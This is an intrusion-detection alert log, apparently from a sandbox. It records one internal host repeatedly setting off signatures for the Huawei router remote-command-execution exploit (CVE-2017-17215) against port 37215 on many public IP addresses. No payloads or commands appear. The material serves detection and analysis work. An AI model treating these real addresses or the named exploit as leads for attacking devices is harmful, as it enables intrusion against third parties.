                                                    07/10/24-08:26:11.592193TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5990837215192.168.2.14157.166.157.182
                                                    07/10/24-08:26:53.182396TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5037837215192.168.2.14197.14.184.16
                                                    07/10/24-08:26:55.302858TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5434837215192.168.2.14123.166.211.108
                                                    07/10/24-08:26:20.152132TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5055837215192.168.2.14157.131.194.192
                                                    07/10/24-08:26:11.592193TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5065037215192.168.2.14157.154.166.148
                                                    07/10/24-08:26:59.637251TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4984237215192.168.2.1441.88.197.58
                                                    07/10/24-08:27:27.041240TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5908037215192.168.2.1441.116.129.166
                                                    07/10/24-08:27:36.290826TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5361637215192.168.2.14197.155.185.68
                                                    07/10/24-08:26:20.162511TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4899437215192.168.2.1441.15.61.67
                                                    07/10/24-08:26:25.428248TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3347437215192.168.2.14157.187.123.31
                                                    07/10/24-08:27:24.954167TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4291237215192.168.2.1441.192.56.252
                                                    07/10/24-08:27:08.417840TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5575037215192.168.2.14157.166.39.41
                                                    07/10/24-08:26:28.933010TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3640837215192.168.2.14157.86.208.159
                                                    07/10/24-08:26:47.978866TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4572837215192.168.2.14157.88.103.104
                                                    07/10/24-08:27:24.879999TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6025037215192.168.2.14197.218.163.143
                                                    07/10/24-08:26:28.630891TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5151237215192.168.2.14157.199.181.216
                                                    07/10/24-08:26:22.290306TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3865037215192.168.2.14157.100.160.12
                                                    07/10/24-08:27:22.573004TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4799637215192.168.2.1441.254.230.121
                                                    07/10/24-08:26:53.152764TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5386437215192.168.2.1441.241.233.107
                                                    07/10/24-08:26:25.479051TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5196837215192.168.2.14157.170.193.58
                                                    07/10/24-08:26:36.425072TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4617637215192.168.2.14197.64.26.233
                                                    07/10/24-08:26:34.202822TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3336237215192.168.2.1466.154.77.82
                                                    07/10/24-08:26:43.626199TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5442837215192.168.2.14197.153.91.109
                                                    07/10/24-08:26:48.016276TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4668037215192.168.2.14197.191.123.72
                                                    07/10/24-08:27:13.862636TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3999237215192.168.2.14197.91.184.187
                                                    07/10/24-08:26:53.192940TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4601637215192.168.2.14157.31.164.119
                                                    07/10/24-08:26:43.745002TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4318037215192.168.2.14157.132.128.242
                                                    07/10/24-08:27:14.881342TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3355837215192.168.2.14143.14.153.76
                                                    07/10/24-08:26:11.576157TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4983037215192.168.2.1441.71.243.126
                                                    07/10/24-08:26:57.666585TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5957837215192.168.2.1441.26.216.247
                                                    07/10/24-08:26:49.863251TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5612637215192.168.2.14197.216.99.193
                                                    07/10/24-08:26:33.263380TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4524437215192.168.2.14157.69.8.44
                                                    07/10/24-08:26:59.623899TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3688837215192.168.2.1441.125.229.27
                                                    07/10/24-08:26:13.753198TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5885837215192.168.2.1441.53.146.130
                                                    07/10/24-08:27:24.976996TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3366237215192.168.2.1441.73.65.14
                                                    07/10/24-08:26:11.121414TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3879837215192.168.2.14157.212.168.33
                                                    07/10/24-08:26:22.221406TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5325637215192.168.2.14157.57.174.23
                                                    07/10/24-08:26:59.539411TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4645837215192.168.2.1460.60.227.153
                                                    07/10/24-08:27:24.949223TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3302637215192.168.2.1441.86.35.47
                                                    07/10/24-08:26:31.069203TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5821837215192.168.2.1451.9.236.140
                                                    07/10/24-08:26:55.297607TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4353437215192.168.2.14157.251.134.135
                                                    07/10/24-08:27:10.617808TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3572837215192.168.2.14157.31.70.4
                                                    07/10/24-08:26:13.778157TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5861237215192.168.2.1441.192.102.16
                                                    07/10/24-08:26:59.538381TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5462237215192.168.2.14157.110.186.126
                                                    07/10/24-08:27:19.299032TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4856037215192.168.2.14157.144.24.212
                                                    07/10/24-08:26:26.597070TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4233637215192.168.2.14197.239.253.179
                                                    07/10/24-08:26:52.051203TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4912037215192.168.2.14106.65.150.96
                                                    07/10/24-08:26:33.227132TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5333437215192.168.2.14157.65.159.237
                                                    07/10/24-08:26:38.624887TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4704237215192.168.2.14157.247.222.168
                                                    07/10/24-08:26:42.154105TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4235437215192.168.2.14197.227.38.209
                                                    07/10/24-08:26:55.442077TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3894437215192.168.2.1441.164.75.177
                                                    07/10/24-08:27:08.415369TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5596837215192.168.2.14157.61.58.243
                                                    07/10/24-08:26:17.974548TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5554437215192.168.2.1441.217.1.150
                                                    07/10/24-08:27:17.053274TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5231437215192.168.2.1441.99.27.71
                                                    07/10/24-08:26:13.754443TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4743837215192.168.2.1441.240.232.222
                                                    07/10/24-08:27:13.752380TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4858637215192.168.2.1441.31.202.206
                                                    07/10/24-08:26:51.994858TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5664637215192.168.2.14197.129.57.161
                                                    07/10/24-08:26:36.415426TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3839437215192.168.2.1441.103.97.151
                                                    07/10/24-08:26:43.870525TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6098437215192.168.2.1441.63.44.228
                                                    07/10/24-08:26:47.909294TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5088237215192.168.2.14197.112.120.87
                                                    07/10/24-08:26:53.135009TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3870237215192.168.2.1441.12.110.224
                                                    07/10/24-08:26:11.616145TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4396437215192.168.2.14197.21.220.29
                                                    07/10/24-08:27:11.504435TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5286837215192.168.2.1441.219.174.222
                                                    07/10/24-08:26:26.589872TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5862437215192.168.2.14157.176.249.141
                                                    07/10/24-08:27:14.865021TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4796637215192.168.2.14197.125.165.148
                                                    07/10/24-08:26:17.928888TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5970637215192.168.2.14197.246.41.160
                                                    07/10/24-08:27:05.189899TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5270837215192.168.2.1441.58.22.227
                                                    07/10/24-08:26:38.581201TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4014437215192.168.2.14197.230.25.92
                                                    07/10/24-08:26:26.573174TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5562837215192.168.2.1441.50.60.149
                                                    07/10/24-08:26:15.788826TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5791037215192.168.2.14197.149.13.241
                                                    07/10/24-08:27:08.412825TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5628237215192.168.2.14157.89.211.128
                                                    07/10/24-08:26:49.844556TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5910237215192.168.2.14126.64.91.145
                                                    07/10/24-08:27:08.402953TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3351837215192.168.2.14157.64.27.212
                                                    07/10/24-08:27:23.838490TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4674437215192.168.2.1441.114.215.166
                                                    07/10/24-08:26:15.791528TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4079237215192.168.2.14197.8.157.134
                                                    07/10/24-08:27:10.612080TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4445637215192.168.2.1441.139.174.122
                                                    07/10/24-08:26:45.620674TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4090637215192.168.2.1441.210.133.254
                                                    07/10/24-08:26:59.634541TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6031237215192.168.2.142.141.160.13
                                                    07/10/24-08:27:24.953647TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3282837215192.168.2.1412.10.52.216
                                                    07/10/24-08:27:00.476380TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5526837215192.168.2.1441.230.0.107
                                                    07/10/24-08:27:34.133115TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3482437215192.168.2.1419.188.174.54
                                                    07/10/24-08:26:34.190814TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5154237215192.168.2.14197.88.101.106
                                                    07/10/24-08:26:38.576463TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6088837215192.168.2.14157.1.114.238
                                                    07/10/24-08:27:22.903696TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5773237215192.168.2.14196.189.242.229
                                                    07/10/24-08:26:55.449292TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4493437215192.168.2.14208.232.219.239
                                                    07/10/24-08:26:45.663934TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4157437215192.168.2.1441.197.59.233
                                                    07/10/24-08:26:59.648560TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3608837215192.168.2.14157.172.226.149
                                                    07/10/24-08:26:59.640486TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3866837215192.168.2.1441.20.77.153
                                                    07/10/24-08:27:10.554172TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4543237215192.168.2.1441.154.224.191
                                                    07/10/24-08:27:33.946860TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5825037215192.168.2.14157.141.195.215
                                                    07/10/24-08:26:28.924774TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3972237215192.168.2.1457.19.166.91
                                                    07/10/24-08:26:34.251063TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4433837215192.168.2.14157.1.111.64
                                                    07/10/24-08:27:28.173873TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4680837215192.168.2.14157.103.162.85
                                                    07/10/24-08:26:14.819309TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3717237215192.168.2.14176.6.162.225
                                                    07/10/24-08:26:36.420785TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5215437215192.168.2.14197.97.218.252
                                                    07/10/24-08:27:20.437179TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4886837215192.168.2.1473.221.48.140
                                                    07/10/24-08:26:22.290306TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3292837215192.168.2.14197.160.123.205
                                                    07/10/24-08:27:19.240664TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4368637215192.168.2.1441.88.85.77
                                                    07/10/24-08:26:43.656959TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4674437215192.168.2.14197.159.136.166
                                                    07/10/24-08:27:07.333954TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4906837215192.168.2.14157.208.53.226
                                                    07/10/24-08:27:05.176375TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4036837215192.168.2.1441.203.155.20
                                                    07/10/24-08:26:17.997409TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5555637215192.168.2.14197.201.191.225
                                                    07/10/24-08:27:30.439171TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5615237215192.168.2.1441.47.198.21
                                                    07/10/24-08:27:23.503899TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3510437215192.168.2.1441.219.201.197
                                                    07/10/24-08:26:13.779688TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5537837215192.168.2.14197.230.151.250
                                                    07/10/24-08:27:05.181070TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5536237215192.168.2.14157.156.253.81
                                                    07/10/24-08:26:47.994983TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5659637215192.168.2.14143.68.209.22
                                                    07/10/24-08:26:43.695962TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4499237215192.168.2.1441.16.213.221
                                                    07/10/24-08:26:43.833150TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3332437215192.168.2.14194.179.104.145
                                                    07/10/24-08:26:36.440414TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4511037215192.168.2.14157.73.6.43
                                                    07/10/24-08:26:45.640181TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5252037215192.168.2.14157.192.111.28
                                                    07/10/24-08:27:13.914013TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4362037215192.168.2.1441.186.50.189
                                                    07/10/24-08:27:22.835700TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3332637215192.168.2.14197.8.155.200
                                                    07/10/24-08:26:41.477579TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3513037215192.168.2.1461.17.184.183
                                                    07/10/24-08:26:52.055054TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3808037215192.168.2.14157.104.14.168
                                                    07/10/24-08:27:07.393644TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4752237215192.168.2.14157.53.141.49
                                                    07/10/24-08:27:22.767946TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3307237215192.168.2.1441.105.22.102
                                                    07/10/24-08:26:13.743815TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5352637215192.168.2.14157.161.249.250
                                                    07/10/24-08:26:26.592095TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5042637215192.168.2.14157.75.82.54
                                                    07/10/24-08:27:27.151316TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3621637215192.168.2.14146.125.31.215
                                                    07/10/24-08:26:47.749012TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3727037215192.168.2.14157.162.5.13
                                                    07/10/24-08:26:29.857933TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4450837215192.168.2.14212.57.73.175
                                                    07/10/24-08:27:27.040022TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6082637215192.168.2.14157.83.163.169
                                                    07/10/24-08:26:51.917440TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5866637215192.168.2.14157.219.16.194
                                                    07/10/24-08:26:57.655011TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3683037215192.168.2.14110.17.87.70
                                                    07/10/24-08:27:22.915722TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4034637215192.168.2.1441.30.61.126
                                                    07/10/24-08:26:26.527286TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5291437215192.168.2.14140.25.241.77
                                                    07/10/24-08:26:26.564654TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3655237215192.168.2.14197.86.76.24
                                                    07/10/24-08:27:10.668582TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3988037215192.168.2.1446.48.111.225
                                                    07/10/24-08:26:13.761894TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5899837215192.168.2.14157.163.102.21
                                                    07/10/24-08:26:53.192940TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6045637215192.168.2.14103.147.172.215
                                                    07/10/24-08:26:43.833151TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4688037215192.168.2.14197.163.49.219
                                                    07/10/24-08:27:23.965651TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5257637215192.168.2.14157.201.174.240
                                                    07/10/24-08:26:42.154105TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3718237215192.168.2.1441.222.176.72
                                                    07/10/24-08:26:43.880984TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4744037215192.168.2.14197.166.182.149
                                                    07/10/24-08:26:42.395679TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3641837215192.168.2.14206.254.155.140
                                                    07/10/24-08:26:43.700993TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4565837215192.168.2.14157.7.154.209
                                                    07/10/24-08:27:28.181617TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3963237215192.168.2.14157.92.233.95
                                                    07/10/24-08:27:30.538016TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4229237215192.168.2.1484.82.143.164
                                                    07/10/24-08:26:26.591446TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5717437215192.168.2.14157.19.126.197
                                                    07/10/24-08:26:49.828950TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5156037215192.168.2.1441.213.165.240
                                                    07/10/24-08:26:22.300900TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4781037215192.168.2.1441.70.172.99
                                                    07/10/24-08:26:28.904469TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3382637215192.168.2.14157.223.178.177
                                                    07/10/24-08:27:13.859325TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4929837215192.168.2.14157.247.16.136
                                                    07/10/24-08:27:22.810780TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5249837215192.168.2.14157.7.226.7
                                                    07/10/24-08:27:20.476661TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4290837215192.168.2.1441.37.205.41
                                                    07/10/24-08:27:05.181070TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5883837215192.168.2.1442.59.230.84
                                                    07/10/24-08:26:28.917896TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4748637215192.168.2.1441.117.65.176
                                                    07/10/24-08:27:10.739148TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5099037215192.168.2.14180.6.44.180
                                                    07/10/24-08:26:22.297520TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4484437215192.168.2.1441.208.45.166
                                                    07/10/24-08:26:28.761940TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4034437215192.168.2.14157.187.54.233
                                                    07/10/24-08:26:59.835498TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4716837215192.168.2.14197.248.82.18
                                                    07/10/24-08:27:33.854360TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5688037215192.168.2.14136.191.19.248
                                                    07/10/24-08:26:55.390670TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4576437215192.168.2.1441.219.241.250
                                                    07/10/24-08:27:08.454232TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5866437215192.168.2.1441.187.110.175
                                                    07/10/24-08:26:23.359081TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3488437215192.168.2.142.21.143.31
                                                    07/10/24-08:26:11.123871TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5158037215192.168.2.14219.72.118.94
                                                    07/10/24-08:26:34.196006TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5495837215192.168.2.1493.23.34.164
                                                    07/10/24-08:26:33.204564TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5117037215192.168.2.14197.74.147.131
                                                    07/10/24-08:26:38.619683TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4924437215192.168.2.1441.90.39.196
                                                    07/10/24-08:27:22.571797TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4333237215192.168.2.1441.134.134.6
                                                    07/10/24-08:26:38.548975TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5790037215192.168.2.14197.171.57.64
                                                    07/10/24-08:27:07.352797TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4524437215192.168.2.1441.142.9.119
                                                    07/10/24-08:26:28.801971TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4214837215192.168.2.14125.235.182.101
                                                    07/10/24-08:26:49.902162TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3799437215192.168.2.1441.167.29.215
                                                    07/10/24-08:26:52.081340TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4115437215192.168.2.14157.74.135.24
                                                    07/10/24-08:26:55.440683TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3999437215192.168.2.14197.146.175.242
                                                    07/10/24-08:26:59.657452TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5575637215192.168.2.14201.222.63.238
                                                    07/10/24-08:27:17.027039TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4039837215192.168.2.14197.157.255.185
                                                    07/10/24-08:27:30.538368TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6007437215192.168.2.1441.254.133.209
                                                    07/10/24-08:27:19.278203TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4332237215192.168.2.14197.50.81.208
                                                    07/10/24-08:26:43.932722TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4157237215192.168.2.14192.182.130.91
                                                    07/10/24-08:26:59.797297TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4827837215192.168.2.1474.96.252.174
                                                    07/10/24-08:26:28.878894TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5581037215192.168.2.1441.102.165.146
                                                    07/10/24-08:27:23.912574TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5884837215192.168.2.14149.158.212.11
                                                    07/10/24-08:26:36.399682TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3830837215192.168.2.1479.18.254.125
                                                    07/10/24-08:27:27.143862TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5779637215192.168.2.1441.242.200.27
                                                    07/10/24-08:27:23.822671TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4967237215192.168.2.14165.240.15.20
                                                    07/10/24-08:26:20.190530TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5529437215192.168.2.1434.232.44.159
                                                    07/10/24-08:27:27.148686TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3441637215192.168.2.14197.229.111.161
                                                    07/10/24-08:27:13.998912TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4655837215192.168.2.1441.63.63.121
                                                    07/10/24-08:26:53.200630TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5584037215192.168.2.14157.56.125.138
                                                    07/10/24-08:27:19.216648TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3862637215192.168.2.14197.194.193.94
                                                    07/10/24-08:27:20.518150TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3380037215192.168.2.1441.199.214.183
                                                    07/10/24-08:26:20.144044TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5856837215192.168.2.14119.55.31.236
